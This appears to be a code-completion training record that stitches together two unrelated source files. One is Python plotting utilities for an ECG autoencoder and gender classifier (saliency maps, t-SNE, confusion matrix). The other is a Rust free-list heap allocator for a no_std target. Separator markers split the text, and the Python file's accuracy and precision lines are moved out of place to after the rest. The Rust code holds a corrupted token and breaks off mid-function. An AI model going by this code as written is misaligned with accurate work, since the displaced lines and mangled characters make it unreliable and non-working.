model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
train_gender_loss, label='ATrain Gender loss')
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
compute scores for accuracy, precision, recall, f1 and auc
args:
gender (np.array): one-hot encoded array of true gender values
gender_pred (np.array): one-hot encoded array of predicted gender values
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores | recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
and what kind of labels (e.g. 'gender')
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samles, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
for i_sample in range(num_samles):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
loss_history.append(loss)
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
model (nn.Module): any model
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show() | accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred) | random_line_split |
lib.rs | #![no_std]
#![allow(clippy::declare_interior_mutable_const)]
#![allow(clippy::cast_ptr_alignment)]
#![allow(clippy::needless_lifetimes)]
extern crate alloc;
mod const_init;
mod imp_static_array;
mod neighbors;
mod size_classes;
use const_init::ConstInit;
use core::alloc::{GlobalAlloc, Layout};
use core::cell::Cell;
use core::cmp;
use core::marker::Sync;
use core::ptr::{self, NonNull};
use core::sync::atomic::{AtomicI32, Ordering};
use imp_static_array as imp;
use memory_units::{size_of, ByteSize, Bytes, Pages, RoundUpTo, Words};
use neighbors::Neighbors;
pub(crate) struct AllocErr;
#[inline]
fn checked_round_up_to<T>(b: Bytes) -> Option<T>
where
T: ByteSize,
Bytes: RoundUpTo<T>,
{
if b.0.checked_add(T::BYTE_SIZE.0).is_none() {
None
} else {
Some(b.round_up_to())
}
}
#[repr(C)]
#[derive(Default, Debug)]
struct CellHeader<'a> {
neighbors: Neighbors<'a, CellHeader<'a>>,
}
impl<'a> AsRef<Neighbors<'a, CellHeader<'a>>> for CellHeader<'a> {
fn as_ref(&self) -> &Neighbors<'a, CellHeader<'a>> {
&self.neighbors
}
}
unsafe impl<'a> neighbors::HasNeighbors<'a, CellHeader<'a>> for CellHeader<'a> {
#[inline]
unsafe fn next_checked(
neighbors: &Neighbors<'a, CellHeader<'a>>,
next: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if next.is_null() || CellHeader::next_cell_is_invalid(neighbors) {
None
} else {
Some(&*next)
}
}
#[inline]
unsafe fn prev_checked(
_neighbors: &Neighbors<'a, CellHeader<'a>>,
prev: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if prev.is_null() {
None
} else {
Some(&*prev)
}
}
}
#[repr(C)]
#[derive(Debug)]
struct AllocatedCell<'a> {
header: CellHeader<'a>,
}
#[test]
fn allocated_cell_layout() {
assert_eq!(
size_of::<CellHeader>(),
size_of::<AllocatedCell>(),
"Safety and correctness depends on AllocatedCell being the same as CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
#[repr(C)]
#[derive(Debug)]
struct FreeCell<'a> {
header: CellHeader<'a>,
next_free_raw: Cell<*const FreeCell<'a>>,
}
#[test]
fn free_cell_layout() {
assert_eq!(
size_of::<CellHeader>() + Words(1),
size_of::<FreeCell>(),
"Safety and correctness depends on FreeCell being only one word larger than CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
impl<'a> CellHeader<'a> {
// ### Semantics of Low Bits in Neighbors Pointers
//
// If `self.neighbors.next_bit_1` is set, then the cell is allocated, and
// should never be in the free list. If the bit is not set, then this cell
// is free, and must be in the free list (or is in the process of being
// added to the free list).
//
// The `self.neighbors.next` pointer always points to the byte just *after*
// this cell. If the `self.neighbors.next_bit_2` bit is not set, then it
// points to the next cell. If that bit is set, then it points to the
// invalid memory that follows this cell.
fn is_allocated(&self) -> bool {
self.neighbors.get_next_bit_1()
}
fn is_free(&self) -> bool {
!self.is_allocated()
}
fn set_allocated(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_1();
}
fn set_free(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_1();
}
fn next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) -> bool {
neighbors.get_next_bit_2()
}
fn set_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_2();
}
fn clear_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_2();
}
fn size(&self) -> Bytes {
let data = unsafe { (self as *const CellHeader<'a>).offset(1) };
let data = data as usize;
let next = self.neighbors.next_unchecked();
let next = next as usize;
Bytes(next - data)
}
fn as_free_cell(&self) -> Option<&FreeCell<'a>> {
if self.is_free() {
Some(unsafe { &*(self as *const CellHeader as *const FreeCell) })
} else {
None
}
}
// Get a pointer to this cell's data without regard to whether this cell is
// allocated or free.
unsafe fn unchecked_data(&self) -> *const u8 {
(self as *const CellHeader).offset(1) as *const u8
}
// Is this cell aligned to the given power-of-2 alignment?
fn is_aligned_to<B: Into<Bytes>>(&self, align: B) -> bool {
let align = align.into();
let data = unsafe { self.unchecked_data() } as usize;
data & (align.0 - 1) == 0
}
}
impl<'a> FreeCell<'a> {
// Low bits in `FreeCell::next_free_raw`.
//
// If `NEXT_FREE_CELL_CAN_MERGE` is set, then the following invariants hold
// true:
//
// * `FreeCell::next_free_raw` (and'd with the mask) is not null.
// * `FreeCell::next_free_raw` is the adjacent `CellHeader::prev_cell_raw`.
//
// Therefore, this free cell can be merged into a single, larger, contiguous
// free cell with its previous neighbor, which is also the next cell in the
// free list.
const NEXT_FREE_CELL_CAN_MERGE: usize = 0b01;
const _RESERVED: usize = 0b10;
const MASK: usize = !0b11;
fn next_free_can_merge(&self) -> bool {
self.next_free_raw.get() as usize & Self::NEXT_FREE_CELL_CAN_MERGE != 0
}
fn set_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free | Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn clear_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free & !Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn next_free(&self) -> *const FreeCell<'a> {
let next_free = self.next_free_raw.get() as usize & Self::MASK;
next_free as *const FreeCell<'a>
}
unsafe fn from_uninitialized(
raw: NonNull<u8>,
_size: Bytes,
next_free: Option<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> *const FreeCell<'a> {
let next_free = next_free.unwrap_or(ptr::null_mut());
let raw = raw.as_ptr() as *mut FreeCell;
ptr::write(
raw,
FreeCell {
header: CellHeader::default(),
next_free_raw: Cell::new(next_free),
},
);
raw
}
fn as_allocated_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &AllocatedCell<'a> {
CellHeader::set_allocated(&self.header.neighbors);
unsafe { &*(self as *const FreeCell as *const AllocatedCell) }
}
// Try and satisfy the given allocation request with this cell.
fn try_alloc<'b>(
&'b self,
previous: &'b Cell<*const FreeCell<'a>>,
alloc_size: Words,
align: Bytes,
policy: &dyn AllocPolicy<'a>,
) -> Option<&'b AllocatedCell<'a>> {
// First, do a quick check that this cell can hold an allocation of the
// requested size.
let size: Bytes = alloc_size.into();
if self.header.size() < size {
return None;
}
// Next, try and allocate by splitting this cell in two, and returning
// the second half.
//
// We allocate from the end of this cell, rather than the beginning,
// because it allows us to satisfy alignment requests. Since we can
// choose to split at some alignment and return the aligned cell at the
// end.
let next = self.header.neighbors.next_unchecked() as usize;
let split_and_aligned = (next - size.0) & !(align.0 - 1);
let data = unsafe { self.header.unchecked_data() } as usize;
let min_cell_size: Bytes = policy.min_cell_size(alloc_size).into();
if data + size_of::<CellHeader>().0 + min_cell_size.0 <= split_and_aligned {
let split_cell_head = split_and_aligned - size_of::<CellHeader>().0;
let split_cell = unsafe {
&*FreeCell::from_uninitialized(
unchecked_unwrap(NonNull::new(split_cell_head as *mut u8)),
Bytes(next - split_cell_head) - size_of::<CellHeader>(),
None,
policy,
)
};
Neighbors::append(&self.header, &split_cell.header);
self.clear_next_free_can_merge();
if CellHeader::next_cell_is_invalid(&self.header.neighbors) {
CellHeader::clear_next_cell_is_invalid(&self.header.neighbors);
CellHeader::set_next_cell_is_invalid(&split_cell.header.neighbors);
}
return Some(split_cell.as_allocated_cell(policy));
}
// There isn't enough room to split this cell and still satisfy the
// requested allocation. Because of the early check, we know this cell
// is large enough to fit the requested size, but is the cell's data | // properly aligned?
if self.header.is_aligned_to(align) {
previous.set(self.next_free());
let allocated = self.as_allocated_cell(policy);
return Some(allocated);
}
None
}
fn insert_into_free_list<'b>(
&'b self,
head: &'b Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> &'b Cell<*const FreeCell<'a>> {
self.next_free_raw.set(head.get());
head.set(self);
head
}
}
impl<'a> AllocatedCell<'a> {
unsafe fn as_free_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &FreeCell<'a> {
CellHeader::set_free(&self.header.neighbors);
let free: &FreeCell = &*(self as *const AllocatedCell as *const FreeCell);
free.next_free_raw.set(ptr::null_mut());
free
}
fn data(&self) -> *const u8 {
let cell = &self.header as *const CellHeader;
unsafe { cell.offset(1) as *const u8 }
}
}
trait AllocPolicy<'a> {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr>;
fn min_cell_size(&self, alloc_size: Words) -> Words;
fn should_merge_adjacent_free_cells(&self) -> bool;
}
struct LargeAllocPolicy;
static LARGE_ALLOC_POLICY: LargeAllocPolicy = LargeAllocPolicy;
impl LargeAllocPolicy {
const MIN_CELL_SIZE: Words = Words(size_classes::SizeClasses::NUM_SIZE_CLASSES * 2);
}
impl<'a> AllocPolicy<'a> for LargeAllocPolicy {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr> {
// To assure that an allocation will always succeed after refilling the
// free list with this new cell, make sure that we allocate enough to
// fulfill the requested alignment, and still have the minimum cell size
// left over.
let size: Bytes = cmp::max(size.into(), (align + Self::MIN_CELL_SIZE) * Words(2));
let pages: Pages = (size + size_of::<CellHeader>()).round_up_to();
let new_pages = imp::alloc_pages(pages)?;
let allocated_size: Bytes = pages.into();
let free_cell = &*FreeCell::from_uninitialized(
new_pages,
allocated_size - size_of::<CellHeader>(),
None,
self as &dyn AllocPolicy<'a>,
);
let next_cell = (new_pages.as_ptr() as *const u8).add(allocated_size.0);
free_cell
.header
.neighbors
.set_next(next_cell as *const CellHeader);
CellHeader::set_next_cell_is_invalid(&free_cell.header.neighbors);
Ok(free_cell)
}
fn min_cell_size(&self, _alloc_size: Words) -> Words {
Self::MIN_CELL_SIZE
}
fn should_merge_adjacent_free_cells(&self) -> bool {
true
}
}
#[inline]
unsafe fn unchecked_unwrap<T>(o: Option<T>) -> T {
match o {
Some(t) => t,
None => core::hint::unreachable_unchecked(),
}
}
unsafe fn walk_free_list<'a, F, T>(
head: &Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
mut f: F,
) -> Result<T, AllocErr>
where
F: FnMut(&Cell<*const FreeCell<'a>>, &FreeCell<'a>) -> Option<T>,
{
// The previous cell in the free list (not to be confused with the current
// cell's previously _adjacent_ cell).
let previous_free = head;
loop {
let current_free = previous_free.get();
if current_free.is_null() {
return Err(AllocErr);
}
let current_free = Cell::new(current_free);
// Now check if this cell can merge with the next cell in the free
// list.
//
// We don't re-check `policy.should_merge_adjacent_free_cells()` because
// the `NEXT_FREE_CELL_CAN_MERGE` bit only gets set after checking with
// the policy.
while (*current_free.get()).next_free_can_merge() {
let current = &*current_free.get();
current.clear_next_free_can_merge();
let prev_neighbor = unchecked_unwrap(
current
.header
.neighbors
.prev()
.and_then(|p| p.as_free_cell()),
);
current.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(¤t.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev_neighbor.header.neighbors);
}
previous_free.set(prev_neighbor);
current_free.set(prev_neighbor);
}
if let Some(result) = f(previous_free, &*current_free.get()) {
return Ok(result);
}
previous_free.set(&*(*current_free.get()).next_free_raw.get());
}
}
/// Do a first-fit allocation from the given free list.
unsafe fn alloc_first_fit<'a>(
size: Words,
align: Bytes,
head: &Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
walk_free_list(head, policy, |previous, current| {
if let Some(allocated) = current.try_alloc(previous, size, align, policy) {
return Some(unchecked_unwrap(NonNull::new(allocated.data() as *mut u8)));
}
None
})
}
unsafe fn alloc_with_refill<'a, 'b>(
size: Words,
align: Bytes,
head: &'b Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
if let Ok(result) = alloc_first_fit(size, align, head, policy) {
return Ok(result);
}
let cell = policy.new_cell_for_free_list(size, align)?;
let head = (*cell).insert_into_free_list(head, policy);
alloc_first_fit(size, align, head, policy)
}
/// A n64 allocator.
///
/// # Safety
///
/// When used in unix environments, cannot move in memory. Typically not an
/// issue if you're just using this as a `static` global allocator.
pub struct N64Alloc<'a> {
head: imp::Exclusive<*const FreeCell<'a>>,
size_classes: size_classes::SizeClasses<'a>,
}
unsafe impl<'a> Sync for N64Alloc<'a> {}
impl<'a> ConstInit for N64Alloc<'a> {
const INIT: N64Alloc<'a> = N64Alloc {
head: imp::Exclusive::INIT,
size_classes: size_classes::SizeClasses::INIT,
};
}
impl<'a> N64Alloc<'a> {
/// An initial `const` default construction of a `N64Alloc` allocator.
///
/// This is usable for initializing `static`s that get set as the global
/// allocator.
pub const INIT: Self = <Self as ConstInit>::INIT;
unsafe fn with_free_list_and_policy_for_size<F, T>(&self, size: Words, align: Bytes, f: F) -> T
where
F: for<'b> FnOnce(&'b Cell<*const FreeCell<'a>>, &'b dyn AllocPolicy<'a>) -> T,
{
if align <= size_of::<usize>() {
if let Some(head) = self.size_classes.get(size) {
let policy = size_classes::SizeClassAllocPolicy(&self.head);
let policy = &policy as &dyn AllocPolicy<'a>;
return head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
});
}
}
let policy = &LARGE_ALLOC_POLICY as &dyn AllocPolicy<'a>;
self.head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
})
}
unsafe fn alloc_impl(&self, layout: Layout) -> Result<NonNull<u8>, AllocErr> {
let size = Bytes(layout.size());
let align = if layout.align() == 0 {
Bytes(1)
} else {
Bytes(layout.align())
};
if size.0 == 0 {
// Ensure that our made up pointer is properly aligned by using the
// alignment as the pointer.
return Ok(NonNull::new_unchecked(align.0 as *mut u8));
}
let word_size: Words = checked_round_up_to(size).ok_or(AllocErr)?;
self.with_free_list_and_policy_for_size(word_size, align, |head, policy| {
alloc_with_refill(word_size, align, head, policy)
})
}
unsafe fn dealloc_impl(&self, ptr: NonNull<u8>, layout: Layout) {
let size = Bytes(layout.size());
if size.0 == 0 {
return;
}
let size: Words = size.round_up_to();
let align = Bytes(layout.align());
self.with_free_list_and_policy_for_size(size, align, |head, policy| {
let cell = (ptr.as_ptr() as *mut CellHeader<'a> as *const CellHeader<'a>).offset(-1);
let cell = &*cell;
let cell: &AllocatedCell<'a> = &*(cell as *const CellHeader as *const AllocatedCell);
let free = cell.as_free_cell(policy);
if policy.should_merge_adjacent_free_cells() {
// Merging with the _previous_ adjacent cell is easy: it is
// already in the free list, so folding this cell into it is all
// that needs to be done. The free list can be left alone.
//
// Merging with the _next_ adjacent cell is a little harder. It
// is already in the free list, but we need to splice it out
// from the free list, since its header will become invalid
// after consolidation, and it is *this* cell's header that
// needs to be in the free list. But we don't have access to the
// pointer pointing to the soon-to-be-invalid header, and
// therefore can't adjust that pointer. So we have a delayed
// consolidation scheme. We insert this cell just after the next
// adjacent cell in the free list, and set the next adjacent
// cell's `NEXT_FREE_CAN_MERGE` bit. The next time that we walk
// the free list for allocation, the bit will be checked and the
// consolidation will happen at that time.
//
// If _both_ the previous and next adjacent cells are free, we
// are faced with a dilemma. We cannot merge all previous,
// current, and next cells together because our singly-linked
// free list doesn't allow for that kind of arbitrary appending
// and splicing. There are a few different kinds of tricks we
// could pull here, but they would increase implementation
// complexity and code size. Instead, we use a heuristic to
// choose whether to merge with the previous or next adjacent
// cell. We could choose to merge with whichever neighbor cell
// is smaller or larger, but we don't. We prefer the previous
// adjacent cell because we can greedily consolidate with it
// immediately, whereas the consolidating with the next adjacent
// cell must be delayed, as explained above.
if let Some(prev) = free
.header
.neighbors
.prev()
.and_then(|p| (*p).as_free_cell())
{
free.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(&free.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev.header.neighbors);
}
return;
}
if let Some(next) = free
.header
.neighbors
.next()
.and_then(|n| (*n).as_free_cell())
{
free.next_free_raw.set(next.next_free());
next.next_free_raw.set(free);
next.set_next_free_can_merge();
return;
}
}
// Either we don't want to merge cells for the current policy, or we
// didn't have the opportunity to do any merging with our adjacent
// neighbors. In either case, push this cell onto the front of the
// free list.
let _head = free.insert_into_free_list(head, policy);
});
}
}
pub static ALLOC_BYTES_LEFT: AtomicI32 = AtomicI32::new(imp::SCRATCH_LEN_BYTES as i32);
pub static ALLOC_BYTES_USED: AtomicI32 = AtomicI32::new(0);
pub use imp::OFFSET as ALLOC_PAGE_OFFSET;
unsafe impl GlobalAlloc for N64Alloc<'static> {
unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
ALLOC_BYTES_LEFT.fetch_sub(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_add(layout.size() as i32, Ordering::SeqCst);
match self.alloc_impl(layout) {
Ok(ptr) => ptr.as_ptr(),
Err(AllocErr) => ptr::null_mut(),
}
}
unsafe fn dealloc(&self, ptr: *mut u8, layout: Layout) {
ALLOC_BYTES_LEFT.fetch_add(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_sub(layout.size() as i32, Ordering::SeqCst);
